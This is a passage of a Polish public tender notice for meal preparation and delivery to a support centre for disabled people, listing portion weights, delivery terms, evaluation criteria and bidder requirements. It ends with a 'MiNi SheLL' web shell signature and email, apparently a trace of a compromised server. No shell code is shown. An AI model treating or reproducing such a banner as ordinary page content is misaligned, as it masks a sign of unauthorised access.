obiadowe dla osób uprawnionych będą dowożone przez Wykonawcę w szczelnie zamkniętych, termicznych i jednorazowych biodegradowalnych pojemnikach;<br/>6)	Zestawy obiadowe będą dowożone przez Wykonawcę uprawnionym klientom do OWiRON od poniedziałku do piątku, z wyłączeniem dni wolnych i świąt, w godzinach 12:30 – 14:00; <br/>7)	Wszelkie koszty związane z dowozem zestawów obiadowych ponosi Wykonawca;<br/>8)	Istnieje możliwość dowożenia do Ośrodka Wsparcia i Rehabilitacji dla Osób Niepełnosprawnych, w uzasadnionych przypadkach, suchego prowiantu jako zamiennika za gorący posiłek, po uprzednim pisemnym uzgodnieniu Wykonawcy z Zamawiającym.<br/>9)	Sposób zgłaszania osób uprawnionych do otrzymania zestawów obiadowych:<br/>a)	Upoważniony pracownik OPS będzie przekazywał Wykonawcy liczbę zamówionych zestawów obiadowych na poszczególne dni nie później niż 2 dni robocze przed końcem danego miesiąca, na każdy następny miesiąc;<br/>b)	W przypadku zmian w danym miesiącu dotyczących liczby zestawów obiadowych, informacja o tych zmianach będzie przekazana do godz. 9.00 dnia poprzedzającego dowiezienie obiadów.<br/>10)	Wykonawca jest zobowiązany do przygotowania i wydawania obiadów z zachowaniem poniżej określonych warunków.<br/>11)	Zestawy obiady powinny być urozmaicone, składać się z tradycyjnych potraw złożonych z co najmniej z dwóch dań:<br/>a)	I danie : zupa z pieczywem;<br/>b)	II danie wieloskładnikowe, surówka/warzywa oraz kompot lub napój.<br/>12)	W ciągu pięciodniowego żywienia klienci powinni otrzymać trzy razy w tygodniu obiad z porcją mięsa (np. sztuka mięsa, kotlet schabowy, udziec z kurczaka, kotlet mielony) lub sosu mięsnego, raz w tygodniu obiad z rybą, w pozostałe dni dowolność ustalenia menu .<br/>13)	Wymagana wartość energetyczna jednego zestawu obiadowego - co najmniej 1200 kcal;<br/>14)	W miarę potrzeb przygotowanie ciepłego posiłku dietetycznego nastąpi wg wskazań lekarza dla osób będących na diecie.<br/>15)	Minimalna wymagana waga/objętość gotowych potraw:<br/>•	zupa – 500 ml + pieczywo (100g),<br/>•	sztuka mięsa lub inne mięso bez panierki – 100 g bez kości,<br/>•	kotlet schabowy – 150 g,<br/>•	kotlet mielony – 120 g,<br/>•	gulasz/potrawka – 150 g,<br/>•	udko z kurczaka – 150 g,<br/>•	ryba bez panierki – 100 g,<br/>•	ryba z panierką – 150 g,<br/>•	bigos – 250 g,<br/>•	ziemniaki, kasza, makaron, ryż, kopytka – 250 g,<br/>•	ryż z jabłkami – 300 g,<br/>•	surówka – 150 g,<br/>•	warzywa gotowane – 150 g,<br/>•	kompot/napój – 250 ml,<br/>•	pierogi, naleśniki, knedle – 400 g.<br/>16)	Posiłki będą przygotowane z pełnowartościowych produktów, z uwzględnieniem świeżych warzyw i owoców sezonowych.<br/>17)	Wartość odżywcza i energetyczna posiłków musi być zgodna z normami i wytycznymi Instytutu Żywności i Żywienia w zakresie żywienia osób dorosłych.<br/>18)	Co tydzień - najpóźniej do piątku do godz. 16.00 Wykonawca przekaże Zamawiającemu (pocztą elektroniczną) jadłospis na tydzień następny. Jadłospis będzie obejmował gramaturę poszczególnych dań.<br/>19)	Wykonawca realizując przedmiot zamówienia zobowiązany jest do przestrzegania przepisów prawnych w tym również przepisów w zakresie przechowywania i przygotowywania artykułów spożywczych.<br/>20)	Posiłki oraz miejsce ich przygotowania i wydawania muszą spełniać wszystkie wymogi ustawy o bezpieczeństwie żywności i żywienia z 28.08.2006r. (Dz. U z 2022r. poz. 2132).<br/>21)	Samochód/samochody, którym dowożone będą posiłki będzie dostosowany do przewozu żywności, spełniający wszystkie wymagania określone stosownymi przepisami. Wykonawca musi dysponować zaświadczeniem/decyzją/opinią stwierdzającym zatwierdzenie środków transportu przez Państwowa Inspekcję Sanitarną.<br/>22)	W przypadku awarii lub innych nieprzewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o nie gorszej jakości na swój koszt z innych źródeł.<br/>23)	Rozliczenie między Zamawiającym i Wykonawcą odbywać się będzie raz w miesiącu do 10 dnia następnego miesiąca, na podstawie prawidłowo wystawionej przez Wykonawcę faktury z podaną liczbą wydanych obiadów, co Wykonawca udokumentuje przedstawiając wygenerowany raport z liczby wydanych obiadów w miesiącu poprzednim. <br/>24)	Złożona faktura wraz z listą osób i liczbą obiadów podlega sprawdzeniu pod względem zgodności dostarczenia do klientów z liczbą wydanych obiadów przez Wykonawcę w miesięcznym okresie rozliczeniowym.<br/>25)	Za prowadzenie dokumentacji stanowiącej podstawę rozliczenia liczby obiadów Zamawiający nie przewiduje dodatkowej opłaty, stanowi to koszt Wykonawcy.<br/>26)	Zamawiający zastrzega sobie prawo weryfikacji jadłospisu oraz przeprowadzenia kontroli jakości, wartości odżywczych oraz gramatury potraw przez wytypowanych pracowników Zamawiającego. W szczególności poprzez:<br/>a)	porównanie zgodności z jadłospisem,<br/>b)	ocenę organoleptyczną (ocena wyglądu potraw, zapachu, oraz smaku poprzez degustację),<br/>c)	ważenie potraw,<br/>d)	porównanie z tabelami wartości odżywczych Instytutu Żywności i Żywienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferty zostaną ocenione wg wzorów podanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie dietetyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne - zatrudnienie kierowcy na podstawie umowy o pracę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Warunek zostanie uznany za spełniony, jeśli Wykonawca, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. Nr 106 poz. 730 ze zm.), posiada wpis do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej oraz decyzję Państwowego Powiatowego Inspektora Sanitarnego zezwalającą na prowadzenie określonej działalności gospodarczej, a w przypadku jednostek, które rozpoczęły działalność gospodarczą przed wejściem w życie ww. rozporządzenia - co najmniej decyzję Państwowego Powiatowego Inspektora Sanitarnego zezwalającą na prowadzenie określonej działalności gospodarczej. Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz uzupełnionego na wezwanie wpisu do rejestru / decyzji, o których mowa powyżej.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż 250 000,00 zł (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100). Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz uzupełnionych na wezwanie dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia. <br/>4)	zdolności technicznej lub zawodowej:<br/>Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał lub wykonuje co najmniej jedno zamówienie porównywalne co do charakteru i wielkości. Wielkość porównywalna, to dla zamawiającego liczba wydanych/dostarczonych posiłków, nie mniejsza niż 50% wielkości zamówienia - na każdą część. Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz uzupełnionego na wezwanie Wykazu wykonanych lub wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane<br/>b)	usługi wymienione w lit. a są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane lub są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. W przypadku usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; Zamawiający dopuszcza aby wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu posłużył się tym samym doświadczeniem dla części 1 i 2 pod warunkiem że doświadczenie to spełnia warunki określone odrębnie dla każdej z tych części. <br/>c)	dysponuje co najmniej jednym samochodem dostosowanym do przewozu żywności, spełniającym wszystkie wymagania określone stosownymi przepisami. Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz uzupełnionego na wezwanie Wykazu środków transportu wraz z zaświadczeniem/decyzją/opinią stwierdzającym ich zatwierdzenie przez Państwową Inspekcję Sanitarną.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców (warunki te musi spełniać co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	wykaz usług wykonanych lub wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane – zał. nr 5 do SWZ,<br/>b)	dowody określające, czy usługi wymienione w wykazie usług zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane lub są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; <br/>W przypadku świadczeń nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>c)	dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>d)	zaświadczenie/decyzja o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej zgodnie z ustawą z dnia 25.08. 2006 r. o bezpieczeństwie żywności i żywienia dla lokalu, w którym są przygotowywane obiady.<br/>e)	Wykaz środków transportu wg wzoru - zał. nr 6 do SWZ<br/>f)	zaświadczenie/decyzja/opinia stwierdzająca zatwierdzenie środków transportu przez Państwową Inspekcję Sanitarną</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, <br/>w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy pzp,<br/>b)	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1 i 2 pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,<br/>c)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienia z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,<br/>d)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienia z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonanie decyzji właściwego organu,<br/>e)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - wzór stanowi zał. nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy/usługi wykonają poszczególni Wykonawcy.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	W przypadku wspólnego ubiegania się przez Wykonawców o zamówienie, Zamawiający dopuszcza możliwość łącznego spełnienia i dokumentowania warunków udziału w postepowaniu dotyczących sytuacji ekonomicznej i zdolności zawodowej.<br/>5.	Przed podpisaniem umowy z Zamawiającym (w przypadku wyboru ich oferty jako najkorzystniejszej) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone w paragrafie 15 Projektowanych postanowień umowy stanowiących załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com